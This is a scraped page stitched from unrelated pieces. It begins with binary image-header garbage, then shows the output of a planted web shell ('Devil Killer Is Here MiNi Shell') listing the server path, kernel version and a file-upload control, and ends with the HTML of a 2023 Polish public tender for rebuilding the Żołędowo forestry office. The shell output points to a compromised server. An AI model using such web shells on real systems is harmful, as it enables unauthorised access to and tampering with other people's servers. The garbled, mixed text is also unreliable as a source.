JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230418/0018082901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> ROZBUDOWA I PRZEBUDOWA BUDYNKU USŁUGOWEGO (ADMINISTRACYJNEGO) – SIEDZIBY NADLEŚNICTWA<br/>ŻOŁĘDOWO LOKALIZACJA: GMINA OSIELSKO, OBRĘB nr 0013 ŻOŁĘDOWO, DZIAŁKA NR 22274/35, UL. PARKOWA<br/>4A </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Żołędowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 090550791</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żołędowo, Parkowa, 4A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Osielsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-031</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zoledowo@torun.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zoledowo.torun.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ROZBUDOWA I PRZEBUDOWA BUDYNKU USŁUGOWEGO (ADMINISTRACYJNEGO) – SIEDZIBY NADLEŚNICTWA<br/>ŻOŁĘDOWO LOKALIZACJA: GMINA OSIELSKO, OBRĘB nr 0013 ŻOŁĘDOWO, DZIAŁKA NR 22274/35, UL. PARKOWA<br/>4A </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-84708adc-ddc4-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00180829</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00161977/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa budynku Nadleśnictwa Żołędowo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Szczegółowe informacje zawarte w pkt 10 SWZ<br/>Osobą uprawnioną do porozumiewania się z Wykonawcami jest:<br/>• w zakresie merytorycznym, dotyczącym przedmiotu zamówienia<br/>Tomasz Lewandowski<br/>e-mail; tomasz.lewandowski@torun.lasy.gov.pl tel; 52 360 53 77<br/>• w zakresie dokumentacji oferty<br/>Łukasz Specjał<br/>e-mail; lukasz.specjal@torun.lasy.gov.pl tel; 52 360 53 91<br/>od poniedziałku do piątku w godz. 8.00 – 14,00 z wyłączeniem dni wolnych od pracy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych, cyfrowego odwzorowania dokumentów w postaci papierowej (elektronicznych<br/>kopii dokumentów stworzonych w postaci papierowej) oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>JOSEPHINE – Skrócona Instrukcja – Wykonawca, która dostępna jest w zakładce Biblioteka instrukcji i linków w prawym, górnym<br/>rogu ekranu głównego portalu JOSEPHINE.<br/>10.5. Maksymalny rozmiar plików przesyłanych za pośrednictwem platformy https://josephine.proebiz.com/pl/ wynosi 500 MB.<br/>10.6. Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie https://josephine.proebiz.com/pl/. Za datę przekazania<br/>wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów w postaci papierowej<br/>(elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz innych informacji przyjmuje się datę ich przekazania na<br/>adres poczty elektronicznej Zamawiającego wskazany w pkt 10.10. lub złożenia na platformie https://josephine.proebiz.com/pl/ .<br/>10.7. Zamawiający zgodnie z §3 ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. 2020 poz. 2452) określa niezbędne<br/>wymagania techniczne umożliwiające pracę na platformie https://josephine.proebiz.com/pl/ . Niezbędne wymagania techniczne<br/>znajdują się w stopce ekranu głównego oprogramowania JOSEPHINE po kliknięciu w słowo WSPARCIE<br/>https://josephine.proebiz.com/pl/support .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)<br/>(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest<br/>Nadleśnictwo Żołedowo ul. Parkowa 4A. Administrator wyznaczył Inspektora Ochrony Danych Osobowych p. Patryk Makowski, z<br/>którym w sprawach dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej<br/>pod adresem iod@comp-net.pl lub telefonicznie pod numerem 796 400 977 .<br/>21.2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>21.3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia.<br/>21.4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające<br/>upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności<br/>21.5. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego<br/>postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki<br/>określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>21.6. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w<br/>oparciu o przepisy PZP.<br/>21.7. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą<br/>przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie<br/>zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Niezależnie od postanowień pkt 21.7. powyżej, w przypadku zawarcia umowy w sprawie<br/>zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>21.9. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać<br/>przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe,<br/>21.10. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.<br/>21.11. Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane osobowe, ma prawo:<br/>1) dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy wykonanie obowiązków, o których<br/>mowa w art. 15 ust. 1 -3 RODO wymagałoby niewspółmiernie dużego wysiłku Zamawiający może żądać wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego<br/>postępowania o udzielenie zamówienia publicznego;<br/>2) do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego, ani zmianą postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności<br/>protokołu oraz jego załączników;<br/>3) do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego; prawo to<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż przetwarzanie jej danych osobowych<br/>narusza przepisy o ochronie danych osobowych, w tym przepisy RODO.<br/>21.12. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych określa PZP.<br/>21.13. Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia publicznego nie przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21 RODO prawo sprzeciwu wobec<br/>przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.<br/>21.14. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów<br/>upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach<br/>sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane<br/>osobowe są przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.6.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1374110,66 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Zakres rzeczowy przedmiotu zamówienia<br/>Projektowane zmiany w zakresie niniejszego opracowania:<br/>- rozbiórka parterowej podpiwniczonej przybudówki w miejscu planowanej<br/>rozbudowy;<br/>- rozbudowa – po stronie północno-wschodniej obejmować będzie klatkę schodową<br/>wraz z pomieszczeniami: wc, magazynowym oraz aneksem kuchennym, na poziomie<br/>piwnicy pomieszczenie garażowe;<br/>- przebudowa – zmiana układu niektórych pomieszczeń w celu dostosowania do<br/>potrzeb użytkownika, zmiany w zakresie otworów drzwiowych i okiennych,<br/>zaprojektowano również dodatkowe okna połaciowe;<br/>- montaż windy zewnętrznej w celu zapewnienia dostępu dla osób poruszających się<br/>na wózkach.<br/>Projektowane zmiany w zakresie opracowań branżowych:<br/>- przebudowa i rozbudowa instalacji wewnętrznych;<br/>- przebudowa fragmentu rury drenarskiej (likwidacja kolizji z planowaną rozbudową);<br/>2) Zakres prac budowlanych i rozbiórkowych.<br/>Prace budowlane wykonywane wewnątrz i na zewnątrz budynku:<br/>- rozbiórka parterowej podpiwniczonej przybudówki;<br/>- rozbudowa i przebudowa budynku; budowa windy zewnętrznej;<br/>- rozbudowa i przebudowa instalacji wewnętrznych;<br/>- remont zewnętrznych i wewnętrznych elementów budynku;<br/>3) Proponowana kolejność wykonywania prac umożliwiająca stałe użytkowanie budynku:<br/>- przebudowa i przygotowanie „na gotowo” pomieszczeń 2.3, 2.4, 2.5 na pierwszym<br/>piętrze (łącznie z pracami instalacyjnymi);<br/>- przeniesienie użytkowników biur nr 8 na parterze oraz nr 9 na piętrze (oznaczenia wg<br/>inwentaryzacji) do pomieszczeń 2.3; 2.4 i 2.5 na piętrze (oznaczenia wg projektu<br/>rozbudowy i przebudowy);<br/>- wyłączenie z użytkowania pomieszczeń: nr 9 w piwnicy, nr 8 na parterze oraz nr 7, 8, 9<br/>na piętrze (oznaczenia wg inwentaryzacji);<br/>- rozbiórka przybudówki;<br/>- wyłączenie z użytkowania pomieszczeń nr 10 i 11 na piętrze (oznaczenia wg<br/>inwentaryzacji)<br/>- wykonanie rozbudowy budynku z jednoczesną przebudową pomieszczeń nr 2.7; 2.8 i<br/>2.11 na piętrze oraz 3.3 na poddaszu (oznaczenia wg projektu rozbudowy i<br/>przebudowy);<br/>- wykonanie rozbudowy „na gotowo” oraz przygotowanie do użytkowania pomieszczeń<br/>2.7, 2.8 i 2.11 (oznaczenia wg projektu rozbudowy i przebudowy);<br/>- demontaż schodów na poddasze i zabudowa otworu w stropie, przebudowa<br/>pomieszczeń 2.12 i 2.13 na piętrze (oznaczenia wg projektu rozbudowy i przebudowy);<br/>- remont i przebudowa pomieszczeń wc na parterze i piętrze (wyłączone z użytkowania<br/>mogą być jednocześnie tylko pomieszczenia wc na jednej kondygnacji);<br/>- remont nie wymienionych powyżej pomieszczeń biurowych w zakresie prac malarskich<br/>oraz wymiany podłóg;<br/>- w ostatnim etapie wykonać prace budowlane i remontowe w pomieszczeniach<br/>komunikacji i na klatce schodowej, łącznie z wymianą schodów na piętro.<br/>Rozbiórka przybudówki:<br/>- demontaż i usunięcie z budynku wyposażenia ruchomego (np. meble, żaluzje)<br/>- demontaż instalacji;<br/>- rozbiórka sufitów;<br/>- rozbiórka warstw wykończeniowych posadzek (okładziny z płytek);<br/>- demontaż stolarki drzwiowej i okiennej;<br/>- rozbiórka ścianek działowych;<br/>- demontaż pokrycia dachowego i obróbek blacharskich;<br/>- rozbiórka ścian zewnętrznych parteru;<br/>- rozbiórka nawierzchni z kostki brukowej oraz podbudowy (w obrębie rozbieranej części<br/>budynku) - ręczne odkopanie części podziemnej budynku oraz zabezpieczenie uzbrojenia<br/>podziemnego przed uszkodzeniem; materiał z rozbiórki nawierzchni oczyścić, ułożyć na<br/>paletach i zabezpieczyć przed uszkodzeniem, zmagazynować w miejscu uzgodnionym z<br/>Inwestorem w celu ponownego wbudowania;<br/>- rozbiórka stropu żelbetowego nad piwnicą oraz ścian piwnic wraz ze schodami<br/>zewnętrznymi;<br/>- segregacja, wywóz i utylizacja materiałów z rozbiórki zgodnie z obowiązującymi<br/>przepisami;<br/>- materiały z rozbiórki przeznaczone do późniejszego wykorzystania wskazywane będą<br/>Przez przedstawiciela Inwestora na bieżąco, podczas prowadzenia prac (w takim<br/>wypadku podlegać będą oczyszczeniu i zabezpieczeniu przed uszkodzeniem).<br/>Elementy budynku przeznaczone do rozbiórki lub demontażu oznaczono w części<br/>rysunkowej projektu.<br/>4) Opracowanie branży elektrycznej dotyczy instalacji elektrycznych i teletechnicznych<br/>wewnętrznych, w zakresie obejmującym pomieszczenia podlegające przebudowie i<br/>rozbudowie:<br/>- demontaże zbędnych instalacji elektrycznych i teletechnicznych,<br/>- przeniesienia instalacji elektrycznych i teletechnicznych,<br/>- zasilanie obiektu (wykonanie złącza kablowo-pomiarowego, modernizacja głównej<br/>tablicy rozdzielczej GTR),<br/>- wykonanie przeciwpożarowego wyłącznika prądu dla obiektu,<br/>- tablice rozdzielcze piętrowe (wymiana istniejących),<br/>- instalacje elektryczne siłowe, gniazd wtykowych 230V, 400V, zasilanie urządzeń<br/>wyposażenia budynku,<br/>- instalacje elektryczne oświetleniowe (oświetlenie podstawowe w objęte rozbudową i<br/>przebudową oraz nowe oświetlenie w istniejących korytarzach na parterze, piętrze oraz<br/>w istniejącej klatce schodowej),<br/>- awaryjne oświetlenie ewakuacyjne w istniejących i projektowanych drogach<br/>ewakuacyjnych (korytarze, klatki schodowe),<br/>- instalacja połączeń wyrównawczych,<br/>- ochrona przeciwporażeniowa,<br/>- ochrona przed przepięciami,<br/>- instalacja odgromowa (na projektowanym dachu),<br/>- instalacje teletechniczne – instalacja okablowania teleinformatycznego dla<br/>projektowanych pomieszczeń, przeniesienie stanowiska monitoringu CCTV, instalacja<br/>nagłośnienia w Sali konferencyjnej na poddaszu, dostosowanie istniejącej instalacji<br/>alarmowej do aktualnego układu pomieszczeń, instalacja alarmowo-przyzywowa w WC<br/>dla osób niepełnosprawnych.<br/>5) Instalacja centralnego ogrzewania<br/>- OPIS TECHNICZNY<br/>do projektu technicznego rozbudowy instalacji centralnego ogrzewania<br/>w budynku &#34;Nadleśnictwa Żołędowo&#34; przy ul. Parkowej 4a w Żołędowie<br/>6) Instalacje wod-kan<br/>- OPIS TECHNICZNY<br/>do projektu technicznego wewnętrznych instalacji wod-kan<br/>i zewnętrznej instalacji kanalizacji sanitarnej dla budynku &#34;Nadleśnictwa<br/>Żołędowo&#34; przy ul. Parkowej 4a w Żołędowie<br/>7) Klimatyzacja<br/>- OPIS TECHNICZNY<br/>do projektu technicznego klimatyzacji dla budynku &#34;Nadleśnictwa Żołędowo&#34;<br/>przy ul. Parkowej 4a w Żołędowie<br/>Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru<br/>robót budowlanych stanowiące Załącznik nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający dopuszcza możliwość zastosowania na podstawie art. 441 prawa opcji w zakresie wykonania robót których nie<br/>dało się przewidzieć w wysokości do 20% wartości zamówienia podstawowego. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert w każdym Pakiecie Zamawiający będzie się kierował następującym kryterium oceny<br/>ofert:<br/>Cena – 60 %<br/>Okres gwarancji - 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 